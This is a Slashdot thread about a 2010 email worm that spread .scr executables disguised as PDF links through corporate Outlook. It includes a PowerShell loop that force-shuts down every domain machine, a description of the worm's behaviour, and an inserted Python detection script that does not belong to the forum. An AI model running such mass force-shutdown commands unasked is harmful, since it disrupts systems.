      And users do not even have to enter a password, they just have to click . Have them enter their password all the time and they would at least get more annoyed, and that may also cause software to be fixed.

      What's the difference? So they have to click instead of entering "123" and you've slowed them down a 10th of a second. And seriously, this is the Linux user's solution to a user problem? Modify the behavior by making the UI a pain in the ass and pissing the user off? No wonder no one uses your OS.

      However what it can not do is install and hide itself into some system directory, making detection and cleaning an infection much easier on Linux.

      I'm sorry, root can do absolutely ANYTHING to a Linux machine. If a user is convinced (through way of enticing screensaver) to give a malicious piece of code root access, what exactly is stopping it from destroying the system? Also for most users destroying home is equivalent to destroying the system.

      And that is not even looking at the many many security bugs that are still present in Windows.

      Because we all know Linux is bug free

      OS-9 had become a mess. Insecure, buggy, unstable, unmaintainable. So they started anew, and very successful.

      If you had even bothered to use Windows 7, you wold know it's stable, fast, secure, and a pleasure to use. At least that's the general consensus. Of course you should actually, I don't now, USE the software before you critique it. I still can't believe you're basing these assertions from your experience with pre-SP1 XP

    4. Re:It's not by wvmarle · · Score: 1

      Of course, I know data is the most important, that's what computers are meant to handle. Second most important is a computer that works reliably. And that's why I backup /home. And large parts of /var (where a.o. the imap base lives, together with lots of other important data) and /etc. Also for availability /var and /home are on a raid1, that saved me once already when one of those disks died.

    5. Re:It's not by StuartHankins · · Score: 1

      And yet OS X and Linux systems don't have any viruses. You're splitting hairs and missing the point. Results speak volumes.

    6. Re:It's not by MrSenile · · Score: 2, Informative

      It seems? So you're basing these comments off of something, rather than blowing hot air? I would love to see some examples of these mysterious and unexpected UAC prompts. SInce you've never used Windows 7, I'm sure this will be a hard request.

      I find a lot of games and some applications (mostly window tool applications like spybot search & destroy) always brings up the UAC. It'd be nice to be able to tag it saying 'yes, I know this application will bring up this prompt, now ignore this one application' without having to raise or lower the security operating system wide, but that's my personal beef with Win 7.

      What's the difference? So they have to click instead of entering "123" and you've slowed them down a 10th of a second. And seriously, this is the Linux user's solution to a user problem? Modify the behavior by making the UI a pain in the ass and pissing the user off? No wonder no one uses your OS.

      And I'm assuming you've used this OS to compare what he's saying or are you taking someone else's word for something without first hand experience? You know, like you've accused the other guy of doing? Just curious.

      I'm sorry, root can do absolutely ANYTHING to a Linux machine. If a user is convinced (through way of enticing screensaver) to give a malicious piece of code root access, what exactly is stopping it from destroying the system? Also for most users destroying home is equivalent to destroying the system.

      You've obviously not used Linux. LIDS, ACL's, SELinux, and many other tools, including, but not limited to chroot jails, allows you to lock down a system, even from root, from specific areas. While I'm sure Windows has similiar 'tools', especially in a networked environment where you can set up security policies, the fact that you said Linux can be configured to allow 'root to do absolutely ANYTHING to a Linux machine' is a fallacy and you need to retract that statement. Your opinion is flawed. Perhaps because like you accused someone else, you've not used Linux enough to draw conclusions?

      Because we all know Linux is bug free

      This was a stupid statement. Nothing is bug free. You're obviously trolling, but at least Linux seems to address bugs, generally (but not always) faster than the Windows counterpart. And yes, there's several links to confirm that, and no, I'm not going to bother repeating other slashdot topics to feed you.

      If you had even bothered to use Windows 7, you wold know it's stable, fast, secure, and a pleasure to use. At least that's the general consensus. Of course you should actually, I don't now, USE the software before you critique it. I still can't believe you're basing these assertions from your experience with pre-SP1 XP

      Oh agreed, it's more stable than XP, but as I've had it bluescreen a few times, sometimes with similiar screens as XP (like the NOT_LT_OR_EQ bs), or have explorer crash on me asking me kindly if I want to send the bug report to Microsoft (I do of course), the fact your global comment of 'stable' is flawed. More stable than XP, yes. Stable globally? No.

      Fast, yes, it's faster. But on the same hardware that XP ran 'fast' on it's actually a touch slower. It needs better video and better CPU to actually run 'faster'. Does this obviously by better threading, better memory management, and streamlined I/O. Only took them 20 years to do it right (or at least 'better'). So while overall, yes, it IS faster, this is also bias based on the hardware you run it on.

      Secure? The security is about equal to Win 2008 server for security, which while a great improvement over other windows, is still, frankly broken at the object layer allowing viruses (like flash viruses, email viruses, etc) to propigate quite nicely. The fact that other operating systems have less (or no) real viruses, while enjoyable, is moot. The fact is Windows still does, thus, shoots th

    7. Re:It's not by WuphonsReach · · Score: 1

      I would qualify that as "And yet OS X and Linux systems don't have many viruses.".

      There's a few reasons for that:

      - Lack of market penetration.
      - Hackers typically work on what they are familiar with, which is generally Windows.
      - Better default out-of-the-box security (not running as admin, mostly).

      Back in the bad old days, classic Mac OS was a badly designed system that was easy to infect (similar to Win95/Win98 design). I encountered numerous Mac OS viruses / trojans back in the late 80s and early 90s.

      --
      Wolde you bothe eate your cake, and have your cake?
  32. Outlook by Witmar · · Score: 1

    Who uses software based e-mail anymore? you can't access it from every where

    1. Re:Outlook by turbidostato · · Score: 1

      "Who uses software based e-mail anymore? you can't access it from every where"

      Uhhh... me. Are you still using only snail mail or is it that your e-mail clean is working out of fairy dust instead of ones and zeroes?

      And no I can't access my e-mail from every where, I still need a computer-like device to do it. Do you access your e-mail by direct brain connection?

  33. Evolution by Duree · · Score: 1

    This is why I don't click on links I don't know. And why I don't use Outlook! Those that still click on unknown links may deserve what they get. Just saying.

  34. FLAMEBAIT article!!!!!!!!1one Windows is so secure by Requiem18th · · Score: 1

    Slashdot must be soo freetarded for pointing out that that this Windows worm only infects Windows!

    Because Windows is just as secure as Linux/Mac!

    It must be so because I got modded flamebait last time I suggested Windows was more virus prone than alternatives. /rant

    Ok rant time over, it's because of shit like this that botnets will never case to exist. It's like the PDF madness with Adobe, they took the simple task of sending files over email and somehow convert it into a security nightmare. Couldn't they just mark it as non executable by default?

    --
    But... the future refused to change.
  35. Experiencing it here... by maugle · · Score: 1

    We're seeing it at our workplace, many times over. At first, the dumbasses kept hitting "Reply All" (and sending the message to everyone) saying "I wasn't expecting anything, did you send this e-mail to the wrong person?". Now the dumbasses are hitting "Reply All" saying variations of "Don't open, it's a trojan", "I think this is a virus", and (my favorite) "Stop hitting 'Reply All', you're filling up my inbox!".

  36. Depends on Who Patient Zero Is... by IonOtter · · Score: 4, Interesting

    I got one of these at work.

    The reason it didn't nail my machine is because...

    1. I have HTML disabled on Outlook
    2. I never click ANY links that go outside the company.

    I did a quick search on the URL, and it led me to Slashdot in the Google results. Yay Slashdot!!

    But here's the catch? Someone INSIDE the company *did* get hit, and it spread from their address book to everyone else. That's the usual progression, of course, but the source and headers actually made me look twice.

    ALL of the headers, everything, came from inside the company firewall. I could see where it passed through at least 3 firewall systems to get to me.

    When I spoke to network security, they said they'd been fighting it since noon. The reason why is because people are actually READING THE HEADERS and checking the user, and it's coming up legit!

    The folks on our end are actually doing due diligence, they're just not paranoid enough.

    --
    [End Of Line]
    1. Re:Depends on Who Patient Zero Is... by webheaded · · Score: 1

      All of this is rather pointless since, if you actually hover over the link, you can see the link that you see isn't actually the link. My work got hit and I hovered over and saw it was a .scr file. It was kind of hilarious knowing who clicked it because they all had notes on their computers saying not to use that computer and they all had to move to another desk. Idiots.

      One of the managers came over to me and I was like "who would even click that?!" at which point someone ran over and immediately said "I clicked that link and..." Yeah. "You'd better go call desktop services and see what they want you to do." :p

      --
      "Those who would sacrifice essential liberties for a little temporary safety deserve neither liberty nor safety." - BenF
    2. Re:Depends on Who Patient Zero Is... by cbhacking · · Score: 2, Insightful

      You know, all that due diligence makes perfect sense right up until you get to the fact that the "document" or "picture" you were sent isn't actually a PDF or image, but a .SCR - a PE-format executable binary. Windows will bitch at you about 3 different ways if you try and run one of those off the web, and the simple fact that it didn't just open in Adobe Reader should be more than enough of a tip to click no.

      Personally, I suspect the people at your office are simply lying about checking the headers and all to try and look less retarded. It seems to have worked on you.

      --
      There's no place I could be, since I've found Serenity...
  37. I gotta say by FranTaylor · · Score: 1

    I'm pretty impressed with my employer's IT operations because I toiled away all day today, blissfully unaware that any of this was going on. Not a single email, no nuthin.

  38. Dealing with this mess... by don_carnage · · Score: 5, Interesting

    We had to deal with this mess today, running around to PCs and flat-out shutting them off. One user that I came across clicked on the link because he "verified that it was from someone in the office." His Outlook outbox had over 34,000 emails ready to send. Quite a mess and we're still cleaning it up. I thought we had learned our lesson with the "I Love You" virus. What's worse is that the spam filter, IPS, Windows firewall, antivirus, and web proxy all failed to stop the attack.

    1. Re:Dealing with this mess... by turbidostato · · Score: 4, Insightful

      "We had to deal with this mess today, running around to PCs and flat-out shutting them off."

      Somehow this doesn't happen to appear on the Windows vs Linux TCO studies from Microsoft.

    2. Re:Dealing with this mess... by aarner · · Score: 0, Flamebait

      More troubling, why does no one ever demand some friggin' accountability from those criminally incompetent "security" vendors. This worm is not some brand-spankin-new, just-released-today threat. The first entry in microsoft's web site for Worm:Win32/Visal.A can be found here http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FVisal.A - It went up on August 4 2010 and was updated on August 19 2010. The full text of the email can be found at that site, as well as a list of infection symptoms, spread vectors, and URL patterns of the payload. My own employer spends millions of dollars per year on websense to keep me safe from gmail and youtube, symantec A/V to keep me safe from 30% of my laptop's performance, and a myriad of other safety and security products.

      You'd think that a firm like webNonSense would have the resources to add the payload sites to their list of "naughty" websites. Although it would be a pretty big undertaking for them, after all the worm/trojan does have a huge set of THREE FUCKING URL PATTERNS that it uses to link to the payload. That's a pretty tall order to keep track of 3 whole URL patterns. For example, they start with sharedocuments.com/ and end with Something_BunchOfNumbers.PDF.scr. Like, someone might have to learn how regular expressions work or something - that's time taken away from webNonSenses' primary mission of keeping corporate america safe from boobies. I don't know what WebSenses' slogan or tagline is, but given that it only seems to work on static porn sites that have been around for years, maybe they should think about changing it to "WebSense - Tits or GTFO!"

      You'd think that if the idiots at Microsoft Security Essentials had found this in the wild six weeks ago that our friends at McAfee/Intel and Norton/Symantec would have rolled out a definition file that immunized against the infection already.

      You'd think that the Microsoft Security Essentials idiots would talk to the Microsoft Exchange retards and maybe block the emails at that level. Or maybe they'd block it at the browser level - fit it into the several terabytes or so that counts for an InternetExploder install these days.

      Incidentally, for the fun of it I fired up a Windows VM and logged on to the corporate exchange server this morning after reading about this. I clicked on the link and you'll never guessed what stopped the infection - Good old Firefox threw up the warning. Not the AV software, not websense, not UAC - but firefox caught it on the download/check for virus step.

      So the product with the least responsibility for the save actually saved the day. The best description of the performance of websense, symantec, mcaffee, etc can only best be described as: "They shit the bed."

      Antivirus and security software doesn't work. It never will work. So long as the mindset of security is default permit or blacklisting, this kind of thing will happen again and again. If any good can come of this, it would be the SEC hauling symantec and mcafee and the rest of them off for perpetrating a massive fraud on nearly eveyone.

    3. Re:Dealing with this mess... by Anonymous Coward · · Score: 0

      We had to deal with this mess today, running around to PCs and flat-out shutting them off

      Wouldn't it have been easier to rush to the circuit breaker and pull down the lever that says "Main"? ...just saying

    4. Re:Dealing with this mess... by jpmorgan · · Score: 1

      What, you think replacing Windows with Linux is magically going to grant its user 20 IQ points?

    5. Re:Dealing with this mess... by turbidostato · · Score: 3, Insightful

      "What, you think replacing Windows with Linux is magically going to grant its user 20 IQ points?"

      I think that, at the very least, the grandparent wouldn't need to "run around to PCs and flat-out shutting them off": he could have done the same from the comfortability of his chair and the aid of ssh.

    6. Re:Dealing with this mess... by Anonymous Coward · · Score: 0

      We had to deal with this mess today, running around to PCs and flat-out shutting them off

      Would it not have been easier to go to the circuit breaker box and pull down the lever labeled "Main"?...I'm just saying

    7. Re:Dealing with this mess... by cbhacking · · Score: 1

      You don't even need SSH to do this in Windows; a domain administrator can use
      shutdown /m
      to remotely shut down any machine on the network. They could also remote desktop in and do it. Or they could kill your connection / blacklist your computer at the router. Or they could just tell you to turn the damn thing off yourself.

      If your IT guys are so stupid they're running around physically pressing power switches, they're at least as technologically idiotic as people who run as Admin and run executable files linked to in email.

      --
      There's no place I could be, since I've found Serenity...
    8. Re:Dealing with this mess... by Spad · · Score: 1

      A smart Windows desktop administrator (Running Windows 7/Server 2008 R2) can use:

      ipmo activedirectory
      foreach($computer in $(Get-ADobject -filter 'objectclass="Computer"' -searchbase "[OU with all your computer accounts in])){
      shutdown /s /f /m $computer
      }

      Or the 50-line VBScript counterpart.

    9. Re:Dealing with this mess... by jimicus · · Score: 1

      Are you aware that there exist mail filtering programs that check any links and disarm those that look like they point at something dodgy?

    10. Re:Dealing with this mess... by jimicus · · Score: 1

      If your IT guys are so stupid they're running around physically pressing power switches, they're at least as technologically idiotic as people who run as Admin and run executable files linked to in email.

      Hate to say it, but IME a significant number of IT guys are that stupid.

      Usually, the excuse given (and I still think it's a lousy excuse) is that they're run off their feet so solidly for 8 hours a day that they literally do not have time to spend 30 seconds Googling for a way to make their life just a little easier. Myself, I think that's bullshit - they'd probably recover a couple of hours every day with that 30 seconds - but hey, what do I know? All of this is going on and I'm replying to /. rather than cleaning up a horrendous mess.

    11. Re:Dealing with this mess... by don_carnage · · Score: 3, Informative

      The main point of physically visiting each machine was to leave a note stating, "Do not turn on this machine until further notice." It's all fine and dandy that you shut them down remotely, but how do you prevent the user from coming in the next day and turning the machine back on?

    12. Re:Dealing with this mess... by Anonymous Coward · · Score: 0

      So can Windows...any novice to the command prompt should know that shutdown.exe can remotely shutdown computers.

    13. Re:Dealing with this mess... by Anonymous Coward · · Score: 0

      While you're ssh'd in, disable their user account.

    14. Re:Dealing with this mess... by Anonymous Coward · · Score: 0

      ...I don't think Linux uses CRSS.exe, so in his case it would have made a considerable difference.

  39. Speak for yourself by Anonymous Coward · · Score: 0

    "You normally think of PDF's as safe."

    Maybe you do, but the sane computer folks have been treating all PDFs == EXEs in terms of malware for awhile.

  40. How well does that work for all software? by Joe+The+Dragon · · Score: 1

    as some software wants to update useing it's own build in systems or it's own updater exe?
    Some software needs to do some Registry / file systems stuff per user for that users first time run.

    Some DRM systems need admin to run right.

    What about the apps that need to run as admin to work right and running it as them "themselves" will not work?

    For some of that newer software is coded to work with UAP but lot's of older apps are not.

  41. Users come and go by syousef · · Score: 1

    The actual reason is that the users still haven't learned from the last 9 years of experience.

    Some users weren't around 9 years ago. Making it sound like users are all stupid may be popular here but it's childish. There are lots of reasons why a user may not know better or may slip up. You need education, not blame.

    --
    These posts express my own personal views, not those of my employer
    1. Re:Users come and go by causality · · Score: 1

      The actual reason is that the users still haven't learned from the last 9 years of experience.

      Some users weren't around 9 years ago. Making it sound like users are all stupid may be popular here but it's childish. There are lots of reasons why a user may not know better or may slip up. You need education, not blame.

      I agree. The last 9 years of the most basic and easily-understood aspects of security history would be included in even the shoddiest education about this subject.

      What's stupid is using what you do not understand and are not actively learning about, while also thinking that nothing bad will ever happen.

      --
      It is a miracle that curiosity survives formal education. - Einstein
  42. Re:User & Admin Retards by IonOtter · · Score: 3, Insightful

    User retards:
    - What retard still uses Outlook?

    You use what the company tells you to.

    - What retard still opens exe files it receives in e-mail?

    This wasn't an .exe file. It was a .scr file that was encapsulated in HTML to make it look like a .pdf. If you had HTML enabled, you'd only see a .pdf.

    - What retard still opens links it receives in e-mail?

    If I wasn't a paranoid security-nut, I would have. It came from inside the company, from a legitimate user I'd been in contact with in the past. But because I'm paranoid and have HTML disabled in Outlook, I could see the REAL link going to someplace in the UK.

    Admin retards:
    - What retard still deploys Outlook/Exchange

    Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

    - What retard still allows exe files to pass through e-mail?

    See above.

    - What retard still doesn't classify links in e-mails that point to shoddy domains as spam?

    See above.

    - What retard mounts a corporate home directory without the noexec flag?

    That's what a zero-day exploit does. It finds a way around that.

    - What retard still allows their users to run as root/admin?

    See above.

    - What retard allows a client computer to send more than 1 mail per second?

    They're called "distribution lists". When the bad guys get inside, they work just as well for them as they do the user.

    --
    [End Of Line]
  43. Mod Parent up -- finally correct definition by Anonymous Coward · · Score: 0

    Mod Parent up --> finally correct definition

  44. Those things are also computers by dbIII · · Score: 1
    You forgot that you CAN install software on those things - firmware updates. A spammer could make a fortune if they could convince a lot of people to install a hacked firmware, yet it has not happened.

    so any spammer would have to exploit security bugs on the device

    As they have to do on MS Windows. As I tried to say above the problem is not stupid users but stupid defaults. It should be as hard to get remote root on MS Windows as it is to get it on those modems.
    I've heard the marketshare excuse since at least 1995 and there are more Mac and Linux desktops out there now than the total sales of Win95. It makes it look as if the excuse has zero value.

    1. Re:Those things are also computers by Pentium100 · · Score: 1

      You forgot that you CAN install software on those things - firmware updates. A spammer could make a fortune if they could convince a lot of people to install a hacked firmware, yet it has not happened.

      First, the spammer would need to convince people that the device has a firmware and that the firmware can be updated. Without knowing the make/model of the modem it would be difficult to write a program that did that automatically (because the way firmware is upgraded is different for every modem), also, the firmware has to be model specific. I can't install a Linksys firmware on my D-Link DSL-500T, I doubt that the firmware from another D-Link ADSL modem would work.

      I've heard the marketshare excuse since at least 1995 and there are more Mac and Linux desktops out there now than the total sales of Win95.

      However, most of the Linux desktops are used by those who do not click on random things. Also, while the number is big, it still is small compared to Windows market share (Wikipedia says that in 2009 October it was 91%). So, now that I (hypothetically) decided to create a virus, should I target 91% of computers with a lot of stupid users, or 1% of computers with a lot of smart users? This is the same reason why less common devices do not have Linux drivers (the device is not common, so nobody in the Linux community wrote the driver and the manufacturer does not care about the 1% of potential users enough to create a driver that would work on the most common distributions). Also, that 1% is divided to a lot of distributions, most of which are not compatible with each other without recompiling the virus.

      Running an unpatched system, misconfigured/no firewall, unneeded services, opening all attachments does not disappear when the user switches to Linux.

    2. Re:Those things are also computers by dbIII · · Score: 1

      Running an unpatched system, misconfigured/no firewall, unneeded services, opening all attachments does not disappear when the user switches to Linux.

      All of that does disappear since the defaults are:
      1/ Automatic check for updates (MS Windows is doing that properly now too)
      2/ Firewall set to only allow a few things by default and block the rest (once again MS Windows is catching up)
      3/ Attachments do not autorun. That one is almost exclusively an application problem with the incredibly stupid behaviour of MS Outlook running everything even if a user wishes to delete it. The problem goes away on MS windows just by not using MS Outlook or configuring it properly (as I said STUPID defaults).

    3. Re:Those things are also computers by pandrijeczko · · Score: 1

      Viruses spread because of a high population of similar operating environments and because that operating environment allows high-level access to the system.

      Windows can be locked down very tightly such that anything a user does on a system is restricted to just the stuff they are allowed to do - but the problem there is that configuring it is complicated for the average home user, and no home user wants to have to keep messing around with those settings just because they need to temporarily open up permissions to, say, install a new application.

      Likewise, corporate IT support people are far too busy and far too few in number to be able to deal with the plethora of support calls from users who need to install something or do something and therefore need some permissions changed temporarily. Consequently, the amount of Windows lockdown that happens in the corporate enterprise is a compromise between security & what your IT team has the capability to support.

      Linux has some definite advantages in this area.

      In the same way that 90% of PCs run Windows (or whatever the statistic is), if 90% of Linux users ran Ubuntu, then there is a relatively large population of users who are potentially running similar operating environments - however, Linux users are a mixed bunch of people running all manner of different distros with their own ways of doing things and their own list of applications that are installed by default. The chances of finding a single application to exploit amongst all those is minimal.

      Additionally, by design, a UNIX-like OS has simpler but stricter permissions by default (which, I agree, are cumbersome if you need to create complicated permissions structures).

      If you are a normal user on a system, then pretty much anything you run or do on a system can only ever damage the files that you own. (Yes, sudo and SUID allow for some exceptions of running stuff as another user, or as root, but likewise these are the first things targetted when anyone security audits a UNIX box, they're known security issues and therefore usage of them is minimised as much as possible).

      An additional advantage of Linux, which doesn't really happen in Windows by default, is that if there's an app you need to install as a user, then a lot of time you can get away with not installing it (under root permissions) centrally on the server but do your own local install in your home directory. This means the application is run as you and cannot touch any files that aren't owned by you.

      So it really comes down to the basic architecture of the OS and what you need to do to secure it. Home users of XP can immediately make themselves administrators on their systems and that means everything they do and run is with that level of permissions - Linux users can do the same if they wish but the first page of any Linux newbie manual or security document will always highly recommend doing as much as you can as a normal user and just change to root permissions when you really need to. (I know Vista and Windows 7 have brought in all this UAC stuff but I don't use either so cannot comment.)

      Incidentally, this is not meant to be Linux zealotry. I personally use Linux more than Windows these days, but I do quite like XP and keep a copy handy for some must have apps and games.

      Linux does have security dangers, these revolve around systems running daemons (services) that can be accessed and exploited by an external party - so whereas much of the security on Windows is focused around protecting against malware, on a Linux system security revolves around not running any services you don't need to and keeping the ones you do need up to date.

      But even then, exploiting a Linux server usually has to be a directed attack by a human being or script against a specific daemon on a specific server; viruses on Windows just spread of their own accord to any available machine.

      --
      Gentoo Linux - another day, another USE flag.
    4. Re:Those things are also computers by Pentium100 · · Score: 1

      The whole "can only access user files" thing is good if there is more than one user on that machine. If the computer is used by a single user, accessing user files is just as bad as root permissions (yes, the virus would be easier to remove, but can do just as much damage).

      Linux users are a mixed bunch of people running all manner of different distros with their own ways of doing things and their own list of applications that are installed by default.

      And if Linux ever gains significant popularity, it will be some distribution (say Ubuntu) and not just the kernel. Windows is one OS - there are different versions of it, but the OS is one. Just like Ubuntu would be if it was more popular. No "average user" is going to use a different distribution than his friends, because then he would be unable to ask for advice (it's bad already with the way Vista changed things from XP; I don't use Vista or 7, so if somebody has a problem with it and asks me for help, if the way to fix things is different than on XP, he can figure it out himself because I won't install 7 just to answer his question; same with Linux - I have Debian, I won't install Ubuntu or Mandriva just to answer somebody's question; the problem is that there are more differences between Linux distros than there are between Windows versions).

      Anyway, UAC in Vista/7 works like graphical sudo in Linux. If you want to do something that requires root access, you have to type in your password, but even if you run as Administrator, you get the prompt, but just need to click OK (if I manage to run KDE as root, I do not get such prompts at all).

      We use Linux where I work; the choice was made primarily because of cost, and I showed that Linux has a browser, software similar to MS Office and can create/open .doc and .xls files. I use Windows at home, though I have one virtual machine that runs a Debian server and two virtual machines with Debian on them to mess around when I need something so I don't break the server VM.

  45. Never Mind That (Re:Got mimedefang?) by EXTomar · · Score: 1

    Never mind that because that isn't the problem. The real problem is blindly running anything from any application simply because it can read the bytes and map them into memory for execution. This would be the same thing as a web browser automatically assuming if you click on a url 'http://blackhatbadstuff.com/csrss.exe' the web browser should tell the OS load it into memory and run it.

    Simply put, email clients, web browsers, and any number of applications should be allowed to do that. More fundamentally, the operating system shouldn't provide facilities for user apps to do this under normal circumstances. Why do we put up with this? The proper fix seems to be removing this stuff from the OS so it doesn't happen, but the world instead seems to believe it is better and just as cost-effective to buy more AV software and just tell people to reinstall when they break it.

    1. Re:Never Mind That (Re:Got mimedefang?) by surgen · · Score: 1

      This would be the same thing as a web browser automatically assuming if you click on a url 'http://blackhatbadstuff.com/csrss.exe' the web browser should tell the OS load it into memory and run it.

      Yes, it's much better that the browser asks you to A) load it now or B) save it so you can load it again and again

  46. Our employees made the day interesting! by JakFrost · · Score: 1

    So we have a few people in our company, 140 out of ~20K, or 0.7% to be exact, who found the vague e-mail enticing enough to open.

    Now, the outcome of this was more of a surprise to us than anything else. It cost us a bit of work here and there but nothing major. The multiple failures by our security products still have us a little puzzled. This was almost like the perfect storm of fail!

    We have a web filtering gateway made by the #1 vendor in that industry that does a great job at classifying, blocking, and catching nefarious things but for some reason it did not catch and block the main .scr file nor the .iq payload files. We thought that by now the product and vendor would block .com, exe, scr, cpl, etc. or any directly executable file extension from being downloaded directly. Fail!

    We are running the #1 e-mail analysis and filtering plug-in set with heuristic detection = high on our #1 most popular corporate e-mail system, but for some unknown reason the filter did not realize that all those people mass e-mailing the distribution lists in alphabetical order with the same e-mail that contains a fake link might be something out of the ordinary to block and filter. Fail!

    We also have the #1 most popular anti-virus product with the latest signatures applied to all the workstation computers automatically, but for some reason this quite popular variant of a previously known worm was not detected by signature-based detection or heuristic detection even though it starts downloading files from the internet, renaming them to exes, and then copies them all over the root drive, the operating system hierarchy, and all the locally attached disks, while it is messing around with policy settings for the most popular e-mail client, enumerates and stops services, and tries to kill processes. Fail!

    Overall we are still surprised at the outcome of all of this and the complete and utter surprise and lack of help from the vendors we use for our security products. Epic fail!
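    The mail-side failure JakFrost describes (many accounts sending the identical message with the same link to distribution lists within minutes, and the filter treating each message on its own) is the kind of thing a mail-flow heuristic catches. The following is an added example, not the logic of any filtering product mentioned in the thread; the outbound log, thresholds and `.invalid` addresses are constructed for the example.

```python
"""
Mail-flow heuristic for the pattern JakFrost describes above: many accounts sending
the same message (same subject, same link) to large recipient lists within minutes.
Added example, not any vendor's filter logic. The outbound log below is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed outbound-mail log: (timestamp, sender, recipient count, subject, first link or None).
SAMPLE_LOG = [
    ("2010-09-09T09:00:00", "newsletter@corp.invalid", 500, "Weekly update", "http://intranet.corp.invalid/news"),
    ("2010-09-09T14:01:05", "alice@corp.invalid", 312, "Here you have", "http://dl.example.invalid/doc.pdf.scr"),
    ("2010-09-09T14:01:40", "bob@corp.invalid", 298, "Here you have", "http://dl.example.invalid/doc.pdf.scr"),
    ("2010-09-09T14:02:12", "carol@corp.invalid", 305, "Here you have", "http://dl.example.invalid/doc.pdf.scr"),
    ("2010-09-09T14:02:55", "dave@corp.invalid", 310, "Here you have", "http://dl.example.invalid/doc.pdf.scr"),
    ("2010-09-09T14:03:30", "erin@corp.invalid", 301, "Here you have", "http://dl.example.invalid/doc.pdf.scr"),
    ("2010-09-09T14:04:10", "frank@corp.invalid", 274, "Here you have", "http://dl.example.invalid/doc.pdf.scr"),
    ("2010-09-09T14:05:00", "zed@corp.invalid", 5, "Lunch?", None),
]


def find_campaigns(log, window=timedelta(minutes=10), min_senders=5, min_recipients=100):
    """Group messages by normalised (subject, link). A group is a campaign when, inside
    any `window`, at least `min_senders` distinct accounts sent it and the messages
    reached at least `min_recipients` recipients in total. One person mailing a big
    list is not flagged; many people mailing the identical link at once is."""
    groups = defaultdict(list)
    for ts, sender, nrcpt, subject, link in log:
        if link is None:
            continue  # a message without a link cannot carry this kind of lure
        key = (" ".join(subject.lower().split()), link)
        groups[key].append((datetime.fromisoformat(ts), sender, nrcpt))

    campaigns = []
    for (subject, link), msgs in groups.items():
        msgs.sort()  # chronological; tuples compare by timestamp first
        for i, (start, _, _) in enumerate(msgs):
            senders, recipients = set(), 0
            for ts, sender, nrcpt in msgs[i:]:
                if ts - start > window:
                    break
                senders.add(sender)
                recipients += nrcpt
            if len(senders) >= min_senders and recipients >= min_recipients:
                campaigns.append({"subject": subject, "link": link,
                                  "senders": len(senders), "recipients": recipients,
                                  "first_seen": start.isoformat()})
                break  # one report per (subject, link) is enough
    return campaigns


if __name__ == "__main__":
    for c in find_campaigns(SAMPLE_LOG):
        print("possible worm campaign:", c)
```

    Run against the constructed log it reports one campaign (six senders, 1800 recipients, the `.scr` link) and ignores both the single-sender newsletter and the linkless lunch note. The thresholds are starting points; a real deployment would tune them on the organisation's own list traffic and hold, rather than delete, what the rule flags.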

  47. Seatbelts by KingAlanI · · Score: 1

    Obviously they're the safer option, but I find them more comfortable anyways, as they keep you from the small bouncing around that comes from normal vehicle motion. I like little harmonious convergences like that. :)

    Bicycle helmets on the other hand...(whistles)

    --
    I listen to both RIAA and non-RIAA stuff if I like the music, tangential business/politics notwithstanding.
  48. Another vote for a default deny policy by Zorton · · Score: 1

    Let's face it, 100% of the users on the internet are never going to learn to practice safe sex. So say you get an infection rate of 20%, that's still plenty of garbage floating around. It's time to start implementing a default deny policy on executables. Shriner and others have talked about this for years and Windows 7 has the ability to lock down the OS to only binaries signed by allowed certificates. Implementation on Unix-like machines is already starting and it would be simple to start adding further hooks into the kernel to block unsigned binaries from even entering address space. This is not to say the signing mechanisms won't be attacked but we have to start moving forward. Virus and e-mail scanners will always be one step behind unless they figure out preemptive solutions that work and don't affect the end user. Once you start making the OS difficult to the user you've lost sight of the whole point and they'll happily click around your pretty little warning boxes anyway.

    The internet is no longer safe, use a condom.

  49. Happened to my work too by webheaded · · Score: 1

    Guess I probably shouldn't mention where but it is a rather large company. I got an email from someone that was in another office in another city on the other side of the country that I'd never talked to before. Needless to say, I paused a moment before doing anything. Hovered over the link, lo and behold, it's linking to a .scr file on a different website. Interesting. I get 2 more and one goes to the majority of the people in our office, so I immediately send an email message saying "DO NOT CLICK THIS LINK." Regardless, at least 4 people in MY group end up clicking the link. Fuck's sake...what is wrong with people? Why would you click a link to an external site from someone you've never even talked to before? Seriously?

    The really funny part was when one of the Team Leads walked over and asked if I knew what was going on. I was like "man, I can't believe anyone would click this...who would even do that?" at which point someone ran over and told us she'd clicked it and asked what to do. *sigh* I'm glad I'm not in our desktop department sometimes. I told her to call them and see what they wanted them to do and to go run over to all of our group to see who clicked it and quarantine that shit. I walked around later and saw notes on the computers of all the people that had clicked it saying not to touch that computer. Lol. They all had to move desks for the remainder of the day. Anyone that did this shouldn't be allowed internet access any more. :p

    --
    "Those who would sacrifice essential liberties for a little temporary safety deserve neither liberty nor safety." - BenF
  50. Re:User & Admin Retards by Anonymous Coward · · Score: 3, Insightful

    Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

    I wonder why you got modded so high. Do you have any clues about email systems?

    1) Support for 150,000 unique email addresses: There is no need to use unique in that sentence. Also support for what? Even my text editor can hold that many email addresses (unlike notepad) and since it is unicode based there is no difficulty adding other countries' usernames. So what the hell do you mean by support for 150k email addresses?

    And why should it be a problem at all for any system? MTAs and MDAs are limited by the amount of traffic and not by user accounts. IMAP takes care of the mailbox access for the individual user. Every part of the system can be split over multiple servers if you need more performance. The mail storage is database driven and scales depending on your choice of database. LDAP can store many more than 150k addresses.

    2) What has the operating system to do with the programs running on it?
    I can run the un*x flavour services as you call it on any system I like (even Windows). There is no real tie between OS and services. They compile on every flavour of un*x and some mad people always take it and port it to Windows, too.

    3) Distribution lists?
    I guess you mean mailing lists with restricted access. Maybe you should restrict the access harder. I can't see any reason for normal people to have access to lists like just because they are a member of the university for example.

  51. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    - What retard still deploys Outlook/Exchange

    Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

    Novell GroupWise running on OES2 Linux?

  52. Re:FLAMEBAIT article!!!!!!!!1one Windows is so sec by FatLittleMonkey · · Score: 1

